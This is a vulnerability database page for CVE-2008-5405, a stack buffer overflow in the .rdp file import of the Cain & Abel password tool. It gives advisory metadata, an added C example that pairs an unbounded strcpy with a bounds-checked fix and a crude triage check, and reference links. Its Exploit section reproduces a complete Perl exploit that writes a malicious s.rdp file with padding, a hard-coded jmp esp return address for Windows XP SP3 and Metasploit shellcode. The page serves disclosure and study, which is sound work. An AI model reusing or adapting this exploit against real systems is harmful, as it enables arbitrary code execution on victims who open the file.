Cain & Abel RDP File Handling Stack Overflow Vulnerability

Vulnerability ID: 1116876    Vulnerability type: Buffer overflow
Published: 2008-11-30    Updated: 2009-01-29
CVE: CVE-2008-5405    CNNVD ID: CNNVD-200812-160
Platform: Windows    CVSS score: 9.3
|Source
https://www.exploit-db.com/exploits/7309
https://cxsecurity.com/issue/WLB-2008120100
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-160
|Details
Cain & Abel is a free password recovery and cracking tool for Windows. Its Remote Desktop Password Decoder reads .rdp files. If a user imports a specially crafted .rdp file containing an overlong string (for example, about 8,250 characters), the file contents overrun a fixed-size stack buffer, allowing a remote attacker to execute arbitrary code with the privileges of the user who opened the file. The attack requires the victim to open the file in Cain & Abel; the published PoC targets version 4.9.24 and earlier on Windows XP SP3.
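The following is an added example, not code from this page, from Cain & Abel, or from the PoC author. Cain's real .rdp parser is not public, so the fixed-size stack buffer (FIELD_MAX), the function names and the triage threshold are assumptions chosen to illustrate the bug class behind CVE-2008-5405. The payload layout (8206 + 4 + 4 + 255 + 164 bytes) is the one the published PoC in the Exploit section of this page writes to s.rdp; the example rebuilds that shape with inert filler, shows the unbounded-copy pattern beside a bounds-checked replacement, and adds a simple pre-open triage check for .rdp files.

```c
/*
 * Added example; not code from this page, from Cain & Abel, or from the
 * PoC author. Cain's real .rdp parser is not public, so FIELD_MAX, the
 * function names and the triage threshold are assumptions used to
 * illustrate the bug class behind CVE-2008-5405. The payload layout
 * (8206 + 4 + 4 + 255 + 164 bytes) is the one used by the published PoC.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define FIELD_MAX 8192          /* assumed size of the stack buffer */

/* PoC layout: padding, saved return address (jmp esp), the 4 bytes ESP
 * points at after the ret, more padding, then the 164-byte shellcode. */
#define POC_PAD1  8206
#define POC_EIP   4
#define POC_ADDR  4
#define POC_PAD2  255
#define POC_SC    164
#define POC_TOTAL (POC_PAD1 + POC_EIP + POC_ADDR + POC_PAD2 + POC_SC)

size_t poc_ret_offset(void)       { return POC_PAD1; }
size_t poc_shellcode_offset(void) { return POC_PAD1 + POC_EIP + POC_ADDR + POC_PAD2; }

/* Build a file with the PoC's shape but inert contents: the two addresses
 * from the PoC are kept so the layout can be checked, the shellcode slot
 * is filled with NOPs. Constructed test input, not the original exploit. */
size_t build_poc_shape(uint8_t *out, size_t cap)
{
    static const uint8_t eip[4]  = { 0xd7, 0x30, 0x9d, 0x7c };  /* 0x7c9d30d7 jmp esp, XP SP3 shell32.dll */
    static const uint8_t addr[4] = { 0xb5, 0xb5, 0xfd, 0x7f };  /* 0x7ffdb5b5, as in the PoC */
    if (cap < POC_TOTAL) return 0;
    memset(out, 'A', POC_TOTAL);
    memcpy(out + POC_PAD1, eip, 4);
    memcpy(out + POC_PAD1 + POC_EIP, addr, 4);
    memset(out + poc_shellcode_offset(), 0x90, POC_SC);
    return POC_TOTAL;
}

/* Vulnerable shape: the field value is copied into a fixed stack buffer
 * with no length check. With a value longer than FIELD_MAX the copy runs
 * past the buffer into the saved frame pointer and return address, which
 * is what the PoC's 8206-byte padding lines up. Never call this on
 * untrusted input; it is here only to show the bug beside the fix. */
int parse_field_unsafe(const char *value)
{
    char buf[FIELD_MAX];
    strcpy(buf, value);                         /* the bug: unbounded copy */
    return (int)strlen(buf);
}

/* Hardened shape: check the length against the buffer before copying and
 * report an error instead of corrupting the stack. */
int parse_field_safe(const char *value, size_t len)
{
    char buf[FIELD_MAX];
    if (len >= sizeof buf) return -1;           /* leave room for the terminator */
    memcpy(buf, value, len);
    buf[len] = '\0';
    return (int)len;
}

/* Triage check for .rdp files before they reach a vulnerable reader: a
 * legitimate file is short "key:type:value" lines, while the PoC is one
 * 8633-byte line. Returns the length of the longest newline-delimited line. */
size_t rdp_longest_line(const uint8_t *data, size_t n)
{
    size_t longest = 0, cur = 0;
    for (size_t i = 0; i < n; i++) {
        if (data[i] == '\n') {
            if (cur > longest) longest = cur;
            cur = 0;
        } else {
            cur++;
        }
    }
    return cur > longest ? cur : longest;
}

int rdp_file_is_suspicious(const uint8_t *data, size_t n)
{
    return rdp_longest_line(data, n) >= FIELD_MAX;   /* threshold is an assumption */
}

int main(void)
{
    static uint8_t file[POC_TOTAL];
    size_t n = build_poc_shape(file, sizeof file);
    printf("PoC file: %zu bytes, return address at offset %zu, shellcode at %zu\n",
           n, poc_ret_offset(), poc_shellcode_offset());
    printf("suspicious: %d, safe parser result: %d\n",
           rdp_file_is_suspicious(file, n), parse_field_safe((const char *)file, n));
    printf("benign field via unsafe parser: %d\n", parse_field_unsafe("full address:s:10.0.0.1"));
    return 0;
}
```

The offsets matter when reading the PoC: after the overwritten return address is popped by `ret`, ESP points at the next four bytes of the file, so `jmp esp` lands on `$addr` and then runs through the 255 bytes of 0x41 (`inc ecx`, an effective NOP sled) into the shellcode. The triage check is deliberately crude; any field of several kilobytes in a file whose legitimate lines are a few dozen bytes is worth rejecting before a vulnerable reader ever parses it.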
|Exploit (EXP)
#!/usr/bin/perl
#
# Cain & Abel <= v4.9.24 .RDP Stack Overflow Exploit
# Exploit by SkD (skdrat@hotmail.com)
# -----------------------------------------------
#
# Nothing much to say about this one. This works on
# an updated Windows XP SP3. On Vista this exploit is way easier;
# the more challenging one was on XP, and here it is.
# Enjoy :). Also remember, if you want to put in your own shellcode,
# there are a few character restrictions, and using Alpha2 or
# Alpha Numerical won't work at all.
# To open the .RDP file in Cain & Abel, click the
# "Remote Password Decoder Dialog" icon.
# Credits to Encrypt3d.M!nd.
# {Author has no responsibility over the damage you do with this!}

use strict; use warnings;

# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =
"\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x19".
"\xc5\xd8\x59\x83\xeb\xfc\xe2\xf4\xe5\x2d\x9c\x59\x19\xc5\x53\x1c".
"\x25\x4e\xa4\x5c\x61\xc4\x37\xd2\x56\xdd\x53\x06\x39\xc4\x33\x10".
"\x92\xf1\x53\x58\xf7\xf4\x18\xc0\xb5\x41\x18\x2d\x1e\x04\x12\x54".
"\x18\x07\x33\xad\x22\x91\xfc\x5d\x6c\x20\x53\x06\x3d\xc4\x33\x3f".
"\x92\xc9\x93\xd2\x46\xd9\xd9\xb2\x92\xd9\x53\x58\xf2\x4c\x84\x7d".
"\x1d\x06\xe9\x99\x7d\x4e\x98\x69\x9c\x05\xa0\x55\x92\x85\xd4\xd2".
"\x69\xd9\x75\xd2\x71\xcd\x33\x50\x92\x45\x68\x59\x19\xc5\x53\x31".
"\x25\x9a\xe9\xaf\x79\x93\x51\xa1\x9a\x05\xa3\x09\x71\x35\x52\x5d".
"\x46\xad\x40\xa7\x93\xcb\x8f\xa6\xfe\xa6\xb9\x35\x7a\xeb\xbd\x21".
"\x7c\xc5\xd8\x59";
my $addr = "\xb5\xb5\xfd\x7f";   # 0x7ffdb5b5: the 4 bytes ESP points at after the ret, i.e. what jmp esp executes first
my $overflow = "\x41" x 8206 ;    # padding up to the saved return address
my $overflow2 = "\x41" x 255 ;    # 0x41 = inc ecx on x86, so this runs as a NOP sled into the shellcode
my $eip = "\xd7\x30\x9d\x7c"; #   FOR WINDOWS XP SP3:  0x7c9d30d7       jmp esp (shell32.dll)

# File layout: padding | return address | $addr | NOP sled | shellcode.
# Written as raw bytes so no newline translation can alter the payload.
open(my $rdp, ">", "s.rdp") or die "cannot create s.rdp: $!";
binmode($rdp);
print $rdp $overflow.$eip.$addr.$overflow2.$shellcode;
close($rdp);

# milw0rm.com [2008-11-30]
|References

Source: XF
Name: cainabel-rdp-bo(46940)
Link: http://xforce.iss.net/xforce/xfdb/46940
Source: BID
Name: 32543
Link: http://www.securityfocus.com/bid/32543
Source: MILW0RM
Name: 7309
Link: http://www.milw0rm.com/exploits/7309
Source: MILW0RM
Name: 7297
Link: http://www.milw0rm.com/exploits/7297
Source: VUPEN
Name: ADV-2008-3286
Link: http://www.frsirt.com/english/advisories/2008/3286
Source: SREASON
Name: 4703
Link: http://securityreason.com/securityalert/4703
Source: SECUNIA
Name: 32794
Link: http://secunia.com/advisories/32794
Source: oxid.netsons.org
Link: http://oxid.netsons.org/phpBB2/viewtopic.php?t=2750
Source: OSVDB
Name: 50342
Link: http://osvdb.org/50342